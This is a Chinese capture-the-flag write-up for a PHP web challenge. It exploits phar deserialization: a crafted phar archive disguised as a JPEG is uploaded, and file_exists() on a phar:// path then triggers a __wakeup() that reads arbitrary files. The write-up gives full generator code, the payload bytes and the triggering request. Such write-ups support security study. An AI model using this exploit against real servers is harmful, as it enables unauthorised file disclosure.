第五空间-2022-WP


web

5_web_BaliYun

访问www.zip 可以获取到源码,就两个文件,index.php和class.php

index.php

<?php
// Challenge entry point, quoted as shipped in www.zip (the weaknesses are the subject of the writeup).
include("class.php");
// img_name comes straight from the query string; check_img::img_check() hands it to file_exists(),
// which also resolves stream wrappers such as phar:// -- this is the deserialization trigger used below.
if(isset($_GET['img_name'])){
$down = new check_img();
echo $down->img_check();
}
// Any multipart upload in the "file" field goes through upload::start() (extension check, then move).
if(isset($_FILES["file"]["name"])){
$up = new upload();
echo $up->start();
}

class.php

<?php
class upload{
// Handles the multipart "file" upload. The class is also the deserialization gadget:
// __wakeup() below reads whatever path is stored in $filename.
public $filename;   // raw client-supplied name from $_FILES
public $ext;        // text after the last "." of that name
public $size;       // size in KiB (computed, never checked)
public $Valid_ext;  // extension whitelist

public function __construct(){
$this->filename = $_FILES["file"]["name"];
// Only the last dot-separated segment is inspected and the content is never examined,
// so a phar archive saved as "x.jpg" passes the whitelist.
// (end() on a temporary also raises "Only variables should be passed by reference".)
$this->ext = end(explode(".", $_FILES["file"]["name"]));
$this->size = $_FILES["file"]["size"] / 1024;
$this->Valid_ext = array("gif", "jpeg", "jpg", "png");
}

public function start(){
return $this->check();
}

private function check(){
// Existence is tested against the bare name (relative to the cwd) while move() writes to
// upload/, so this test does not reliably stop re-uploading over an earlier file.
if(file_exists($this->filename)){
return "Image already exsists";
}elseif(!in_array($this->ext, $this->Valid_ext)){
// Loose (non-strict) in_array against the whitelist above.
return "Only Image Can Be Uploaded";
}else{
return $this->move();
}
}

private function move(){
// Destination keeps the client-supplied name; no content validation, no renaming.
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
return "Upload succsess!";
}

public function __wakeup(){
// Runs automatically whenever an upload object is unserialized (here: from phar metadata).
// $filename is attacker-controlled at that point, so this is an arbitrary file read.
echo file_get_contents($this->filename);
}
}


class check_img{
public $img_name;   // raw value of ?img_name=
public function __construct(){
$this->img_name = $_GET['img_name'];
}

public function img_check(){
// file_exists() on an unvalidated user path: besides probing the filesystem it accepts
// stream wrappers, and "phar://<uploaded archive>" makes PHP parse the archive's manifest --
// that is how upload::__wakeup() gets triggered although neither file calls unserialize().
if(file_exists($this->img_name)){
return "Image exsists";
}else{
return "Image not exsists";
}
}
}

有上传文件功能和检查文件是否存在功能,可以注意到class.php文件中有两个类,其中的upload类有文件读取:

// Gadget: fires on unserialize; $filename is whatever the serialized payload carries.
public function __wakeup(){
echo file_get_contents($this->filename);
}

__wakeup()是在反序列化过程中会自动调用的魔术方法,也就是说只要我们能够触发反序列化,就可以让服务端读取并输出 $filename 指向的任意文件。但 index.php 和 class.php 中都没有直接调用 unserialize(),需要另找一个反序列化入口。同时 check_img 类有检查文件是否存在的操作:

// Trigger: file_exists() honours the phar:// wrapper, so pointing img_name at the uploaded
// archive makes PHP parse its manifest and unserialize the metadata stored there.
public function img_check(){
if(file_exists($this->img_name)){
return "Image exsists";
}else{
return "Image not exsists";
}
}

文件上传 + 存在 __wakeup() 但没有直接的 unserialize() 调用,这就联想到了 phar 反序列化:file_exists() 等文件系统函数在遇到 phar:// 路径时会解析归档的 manifest,并把其中的 meta-data 反序列化。可以上传一个 meta-data 为 upload 对象的 phar 文件,再通过 img_name=phar://... 的文件检查操作触发反序列化,__wakeup() 就会读取我们指定的文件。注意两点:生成 phar 需要在 phar.readonly=0 下运行(php.ini 默认为 1,否则 new Phar 会抛出异常);这种由文件系统函数自动反序列化 meta-data 的行为在 PHP 8.0 中已被移除(只有 Phar::getMetadata() 才会反序列化),因此推测题目环境为 PHP 7.x。phar 文件生成代码如下:

<?php

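// Gadget class mirrored from the target's class.php: the class name and the property
// names/order must match so the serialized form is what the target's unserialize expects.
// It deliberately has no __wakeup() -- the target's own __wakeup() runs when the metadata
// is unserialized there.
class upload{
public $filename;
public $ext;
public $size;
public $Valid_ext;

// $filename is the path the target's __wakeup() will read; defaults to /flag so the
// original payload is unchanged, but any other file can be requested.
public function __construct($filename = '/flag'){
$this->filename = $filename;
$this->ext = '';
$this->size = 1024;
$this->Valid_ext = array("gif", "jpeg", "jpg", "png");
}
}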
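// Phar creation is refused while phar.readonly=1 (the php.ini default) and the failure only
// shows up as an UnexpectedValueException from the constructor, so check it up front.
// Run as: php -d phar.readonly=0 gen.php [target-path]
if (filter_var(ini_get('phar.readonly'), FILTER_VALIDATE_BOOLEAN)) {
    fwrite(STDERR, "phar.readonly is enabled; run with -d phar.readonly=0\n");
    exit(1);
}
$target = isset($argv[1]) ? $argv[1] : '/flag';

// Phar::__construct() only accepts a .phar name when creating an archive, so build it as
// phar.phar first; the phar:// wrapper does not care about the extension once uploaded.
// Remove a stale archive explicitly instead of hiding errors with @.
if (file_exists('phar.phar')) {
    unlink('phar.phar');
}
$phar = new Phar('phar.phar');
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // minimal stub; the manifest after it carries the metadata
$o = new upload();
$o->filename = $target;                   // path read by the target's upload::__wakeup()
$phar->setMetadata($o);                   // serialized object goes into the manifest
$phar->addFromString("test.txt", "test"); // the writeup includes one dummy entry; keep it
$phar->stopBuffering();                   // signature is computed automatically here

// The target's whitelist accepts only gif/jpeg/jpg/png, so upload the copy named phar.jpg.
copy('phar.phar', 'phar.jpg');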

phar文件内容为:

<?php __HALT_COMPILER(); ?>
?    ? O:6:"upload":4:{s:8:"filename";s:5:"/flag";s:3:"ext";s:0:"";s:4:"size";i:1024;s:9:"Valid_ext";a:4:{i:0;s:3:"gif";i:1;s:4:"jpeg";i:2;s:3:"jpg";i:3;s:3:"png";}} test.txt ?(c ~囟 testy^紮!q@SaD2<5V苪 GBMB

将生成的 phar.phar 重命名为 phar.jpg(上传白名单只允许 gif/jpeg/jpg/png,而 phar:// 伪协议按内容解析、不依赖扩展名),通过上传功能传到 upload/ 目录后,发送如下报文触发反序列化,响应中即带有 /flag 的内容:

GET /?img_name=phar://./upload/phar.jpg HTTP/1.1
Host: 39.107.76.202:24750
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

flag: flag{3QfNeV2JDk8wHKTgk5cHbynjC7HSXW5U}

